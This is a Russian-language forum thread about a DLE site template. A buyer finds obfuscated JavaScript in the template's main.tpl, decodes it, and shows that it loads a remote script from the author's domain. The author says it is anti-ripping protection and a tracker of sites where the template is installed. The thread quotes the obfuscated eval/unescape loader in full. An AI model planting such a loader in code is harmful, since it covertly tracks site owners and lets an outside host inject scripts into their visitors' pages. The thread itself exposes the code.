CMS DataLife Engine - Система управления сайтами

Sign in to follow this  
ShVad

Шаблоны от Greeze

Recommended Posts

Купил шаблон у ·• Greeze •·

Заметил в main.tpl

<script type="text/javascript">scripto='13fhdaptea';eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>"));</script>


d(unescape("%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>"));</script>
Так называемая защита от рипа (по его словам). Начал редактировать шаб - залил на сервер, а там он отображается без стилей. Решил расковырять скрипты... Раскодил функцию D()... Осталось две строки:
%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>


и


%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>
Идем далее: Первая строка:
<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />
Поверим... Пусть называется защитой от рипа... Вторая строка!:
<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Делайте выводы... Скрин PHP файла...

Давайте спросим у Greeze что он скринит к нашим сайтам...

Edited by ShVad

Share this post


Link to post
Share on other sites

Интересненько :). Ну пусть прокомментирует. Врядли же можно быть таким глупым, чтоб одной такой вот фигней взять и поставить крест на своей репутации.

Share this post


Link to post
Share on other sites

<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Давайте спросим у Greeze что он скринит к нашим сайтам...

Greeze, что Ты скринишь к их сайтам?

А серьезно: не раз сталкивался, когда в закодированных скриптах вшивали <iframe>'ы с самым разным наполнением. Чаще всего - разгон трафа, но могут и дрянь какую-нибудь подсунуть. Неприятно...

А с Greeze'ом ни разу не работал, не могу ничего сказать.

Share this post


Link to post
Share on other sites

Вообщем в чёрный список его шаблоны надо заносить, вот и всё...

Share this post


Link to post
Share on other sites

Решил расковырять скрипты...

Раскодил функцию D()...

Первая строка:

Код

<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Edited by lifestar

Share this post


Link to post
Share on other sites

включаем в апаче mod_rewrite создаем в папке с темплейтом файл .htaccess c содержимым (у меня так прописано)

<FilesMatch "(\.(engine|.*sql|templates|tpl(\.php)?|xtmpl))$">

Order allow,deny

</FilesMatch>

Order Deny,Allow

Allow from all

Share this post


Link to post
Share on other sites

всем спасибо за отзывы :)

shvad, тебе отдельный, огромнейший респект.

а теперь по порядку.

Так называемая защита от рипа (по его словам).

это защита от малолеток рипперов, которые не в состоянии раскодировать js файл (а таких предостаточно).

суть кодирования таится в скрытии путя до css файла.

Начал редактировать шаб - залил на сервер, а там он отображается без стилей.

надо внимательнее читать readme, а именно:

В шаблон установлена "защита от рипа", поэтому не меняйте имя папки шаблона, иначе слетит css.

Вторая строка!:

это скрипт собирающий урлы сайтов, куда был установлен шаб.

изучал js на досуге, встроил ради интереса.

если сделать запрос по урлу то вы увидите, что скрипт возвращает пустой js файл.

пакостить никому не собирался, и уж тем более встраивать какие-нибудь бэкдоры :)

всем спасибо за внимание.

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.

Edited by ·• Greeze •·

Share this post


Link to post
Share on other sites

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.
выше уже привели пример.

Есть и другой способ

RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?lifestar.ru [NC]

RewriteRule \.(css)$ - [NC,F,L]
где lifestar.ru - домен где установлен шаблон. Есть и ещё один способ. Сам CSS отдавать при помощи PHP, то есть
<link href="/templates/eneptico/greeze/css.php" rel="stylesheet" type="text/css" />

в самом css.php проверять реффер и ай пи

t0rn, ваш способ у меня не сработал

Share this post


Link to post
Share on other sites

·• Greeze •·,

Я могу написать тебе скрипт который по реферам будет выдавать стили.

Share this post


Link to post
Share on other sites

Ну да, а если я зайду с Outpost'ом, в котором глобально отключена передача HTTP_REFERRER?

Реф - это жутко ненадёжная штука, на неё полагаться совершенно нельзя.

К тому же, HttpWatch для осла или FireBug для огнелиса убивают такую "защиту" на корню :)

Так что, не страдайте фигнёй.

Share this post


Link to post
Share on other sites

посчет рефов согласен.. тем боле что значение можно подменить.

другое дело, я не преследовал цели точно знать, где установлен шаблон.

фигней мы не страдаем, мы занимаемся самообучением..)

Share this post


Link to post
Share on other sites
Так что, не страдайте фигнёй.
Как раз и не понимаю зачем так "извращаться". Не знаю ни одного реально действенного способа защитить свой шаблон и в частности файл стилей. Если вы знаете - говорите, будет открывать) Edited by lifestar

Share this post


Link to post
Share on other sites

Нет такой защиты, с помощью которой можно было бы защитить шаблон от воровства. Кому нужно даже со скриншота сверстает. Я было удивлялся, почему с промо-скриншотов в натуральный размер готовящихся сайтов уже появляются сверстанные шаблоны... Потом подсказали.

Считаю что прятать CSS нет смысла. Как правило у малолеток-рипперов не хватит мозгов ковырять CSS. C таблицами им проще, значительно. Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере :D

Пример сжатого CSS:

h1,h2,h3,h4{font-weight:lighter;margin:0.7em 0 0.5em 0;color:#FFFFFF}h1 a,h2 a,h3 a,h4 a{color:#365c96;text-decoration:none;color:#FFFFFF}h1 a:link,h2 a:link,h3:link a,h4:link a{color:#FFFFFF;text-decoration:none}h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover{color:#990003;text-decoration:underline}h1 a:visited,h2 a:visited,h3 a:visited,h4 a:visited{color:#FFFFFF}h1{font-size:2.0em}h2{font-size:1.7em;margin:0.4em 0 0.3em 0}h3{font-size:1.4em}h4{font-size:1.2em}a{color:#ff8334;text-decoration:underline}a:link{color:#ff8334;text-decoration:underline}a:hover{color:#990003;text-decoration:underline}a:visited,a:active{color:#ff8334}

Сам компрессор тут.

Share this post


Link to post
Share on other sites

Kostya, компрессор - хорошо. Но он нужен для убыстрения загрузки страницы, а не для защиты.

А так можно написать php скрипт, который сам приведёт сжатый вид к нормальному аля

class{

color: #fff;

}

Share this post


Link to post
Share on other sites

можно еще символы заменить :)

например вот такой код:

<div id="container">
заменить на:
#60;div id=&quot;container&quot;#62;

вес файлов увеличится, но зато на быстродействии это ни коем образом не скажется.

да и рипать тяжело будет ;)

не подскажете норм софтину, способную так извратнуться над кодом?)

css обычно просто копируют, защищать нет смысла :)

Edited by ·• Greeze •·

Share this post


Link to post
Share on other sites

lifestar,

я предложил вариант компрессии кода лишь для путанницы:

Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере

хотя конечно же понимаю что такой способ защиты не катит. Нет такой защиты от которой можно защитится.

Greeze,

это в дримвиевере делается.

Share this post


Link to post
Share on other sites

это в дримвиевере делается.

ага, спс.)

надо бы поставить, а то я в основном в блокноте шабашу..)

Share this post


Link to post
Share on other sites

Говорил бы что блокнот у тебя с подсветкой кода, с определением где теги не закрыты, с css-редактором и вообще что ты дримвиевер или хоумсайт блокнотом называешь... Отпонтовался ))

Share this post


Link to post
Share on other sites

нее..) я парень порядочный, можешь поверить..)

недавно поставил notepad++, а раньше все делал в wordpad'e (шабы м3-м5 сверстаны именно в нем).

сам то какой софт насилуешь? ;)

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this